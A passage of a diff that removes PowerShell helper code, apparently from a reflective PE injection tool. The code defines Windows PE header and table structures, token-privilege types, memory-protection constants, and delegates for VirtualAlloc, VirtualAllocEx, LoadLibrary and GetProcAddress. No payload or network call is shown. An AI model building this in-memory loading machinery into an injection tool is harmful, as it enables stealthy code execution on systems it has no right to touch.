-		$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY
-
-		#Struct IMAGE_FILE_HEADER
-		$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
-		$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20)
-		$TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null
-		$TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null
-		$TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null
-		$TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null
-		$IMAGE_FILE_HEADER = $TypeBuilder.CreateType()
-		$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER
-
-		#Struct IMAGE_OPTIONAL_HEADER64
-		$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
-		$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240)
-		($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
-		($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
-		($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
-		($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
-		($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
-		($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
-		($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
-		($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
-		($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null
-		($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
-		($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
-		($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
-		($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
-		($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
-		($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
-		($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
-		($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
-		($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
-		($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
-		($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
-		($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
-		($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
-		($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
-		($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null
-		($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null
-		($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null
-		($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null
-		($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null
-		($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null
-		($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
-		($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
-		($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
-		($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
-		($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
-		($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
-		($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
-		($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
-		($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
-		($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
-		($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
-		($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
-		($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
-		($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
-		($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null
-		($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null
-		$IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType()
-		$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64
-
-		#Struct IMAGE_OPTIONAL_HEADER32
-		$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
-		$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224)
-		($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
-		($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
-		($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
-		($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
-		($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
-		($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
-		($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
-		($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
-		($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null
-		($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null
-		($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
-		($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
-		($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
-		($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
-		($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
-		($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
-		($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
-		($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
-		($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
-		($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
-		($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
-		($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
-		($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
-		($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
-		($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null
-		($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null
-		($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null
-		($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null
-		($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null
-		($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null
-		($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null
-		($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null
-		($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
-		($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
-		($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
-		($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
-		($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
-		($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
-		($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
-		($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
-		($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
-		($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
-		($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
-		($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
-		($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
-		($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
-		$IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType()
-		$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32
-
-		#Struct IMAGE_NT_HEADERS64
-		$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
-		$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264)
-		$TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
-		$TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null
-		$IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType()
-		$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64
-		
-		#Struct IMAGE_NT_HEADERS32
-		$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
-		$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248)
-		$TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
-		$TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null
-		$IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType()
-		$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32
-
-		#Struct IMAGE_DOS_HEADER
-		$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
-		$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64)
-		$TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null
-		$TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null
-		$TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null
-		$TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null
-		$TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null
-		$TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null
-		$TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null
-		$TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null
-		$TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null
-		$TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null
-		$TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null
-		$TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null
-		$TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null
-		$TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null
-
-		$e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal')
-		$ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
-		$FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))
-		$AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4))
-		$e_resField.SetCustomAttribute($AttribBuilder)
-
-		$TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null
-		$TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null
-
-		$e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal')
-		$ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
-		$AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10))
-		$e_res2Field.SetCustomAttribute($AttribBuilder)
-
-		$TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null
-		$IMAGE_DOS_HEADER = $TypeBuilder.CreateType()	
-		$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER
-
-		#Struct IMAGE_SECTION_HEADER
-		$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
-		$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40)
-
-		$nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal')
-		$ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
-		$AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8))
-		$nameField.SetCustomAttribute($AttribBuilder)
-
-		$TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null
-		$TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null
-		$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
-		$IMAGE_SECTION_HEADER = $TypeBuilder.CreateType()
-		$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER
-
-		#Struct IMAGE_BASE_RELOCATION
-		$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
-		$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_BASE_RELOCATION', $Attributes, [System.ValueType], 8)
-		$TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('SizeOfBlock', [UInt32], 'Public') | Out-Null
-		$IMAGE_BASE_RELOCATION = $TypeBuilder.CreateType()
-		$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value $IMAGE_BASE_RELOCATION
-
-		#Struct IMAGE_IMPORT_DESCRIPTOR
-		$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
-		$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_IMPORT_DESCRIPTOR', $Attributes, [System.ValueType], 20)
-		$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('ForwarderChain', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('FirstThunk', [UInt32], 'Public') | Out-Null
-		$IMAGE_IMPORT_DESCRIPTOR = $TypeBuilder.CreateType()
-		$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value $IMAGE_IMPORT_DESCRIPTOR
-
-		#Struct IMAGE_EXPORT_DIRECTORY
-		$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
-		$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40)
-		$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null
-		$TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null
-		$TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null
-		$IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType()
-		$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY
-		
-		#Struct LUID
-		$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
-		$TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8)
-		$TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null
-		$LUID = $TypeBuilder.CreateType()
-		$Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value $LUID
-		
-		#Struct LUID_AND_ATTRIBUTES
-		$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
-		$TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12)
-		$TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null
-		$TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null
-		$LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType()
-		$Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value $LUID_AND_ATTRIBUTES
-		
-		#Struct TOKEN_PRIVILEGES
-		$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
-		$TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16)
-		$TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null
-		$TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null
-		$TOKEN_PRIVILEGES = $TypeBuilder.CreateType()
-		$Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value $TOKEN_PRIVILEGES
-
-		return $Win32Types
-	}
-
-	Function Get-Win32Constants
-	{
-		$Win32Constants = New-Object System.Object
-		
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_ABSOLUTE -Value 0
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_HIGHLOW -Value 3
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_DIR64 -Value 10
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_DISCARDABLE -Value 0x02000000
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_EXECUTE -Value 0x20000000
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_READ -Value 0x40000000
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_WRITE -Value 0x80000000
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_NOT_CACHED -Value 0x04000000
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -Value 0x40
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_NX_COMPAT -Value 0x100
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_QUERY -Value 0x0008
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_ADJUST_PRIVILEGES -Value 0x0020
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name SE_PRIVILEGE_ENABLED -Value 0x2
-		$Win32Constants | Add-Member -MemberType NoteProperty -Name ERROR_NO_TOKEN -Value 0x3f0
-		
-		return $Win32Constants
-	}
-
-	Function Get-Win32Functions
-	{
-		$Win32Functions = New-Object System.Object
-		
-		$VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc
-		$VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
-		$VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate)
-		$Win32Functions | Add-Member NoteProperty -Name VirtualAlloc -Value $VirtualAlloc
-		
-		$VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx
-		$VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
-		$VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate)
-		$Win32Functions | Add-Member NoteProperty -Name VirtualAllocEx -Value $VirtualAllocEx
-		
-		$memcpyAddr = Get-ProcAddress msvcrt.dll memcpy
-		$memcpyDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr]) ([IntPtr])
-		$memcpy = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memcpyAddr, $memcpyDelegate)
-		$Win32Functions | Add-Member -MemberType NoteProperty -Name memcpy -Value $memcpy
-		
-		$memsetAddr = Get-ProcAddress msvcrt.dll memset
-		$memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr])
-		$memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate)
-		$Win32Functions | Add-Member -MemberType NoteProperty -Name memset -Value $memset
-		
-		$LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA
-		$LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr])
-		$LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate)
-		$Win32Functions | Add-Member -MemberType NoteProperty -Name LoadLibrary -Value $LoadLibrary
-		
-		$GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress
-		$GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr])
-		$GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate)
-		$Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddress -Value $GetProcAddress
-		
-		$GetProcAddressIntPtrAddr = Get-ProcAddress kernel32.dll GetProcAddress #This is still GetProcAddress, but instead of PowerShell converting the string to a pointer, you must do it yourself
-		$GetProcAddressIntPtrDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([IntPtr])
-		$GetProcAddressIntPtr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressIntPtrAddr, $GetProcAddressIntPtrDelegate)
-		$Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddressIntPtr -Value $GetProcAddressIntPtr
-		
-		$VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree
-		$VirtualFreeDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32]) ([Bool])
-		$VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate)
-		$Win32Functions | Add-Member NoteProperty -Name VirtualFree -Value $VirtualFree
-		
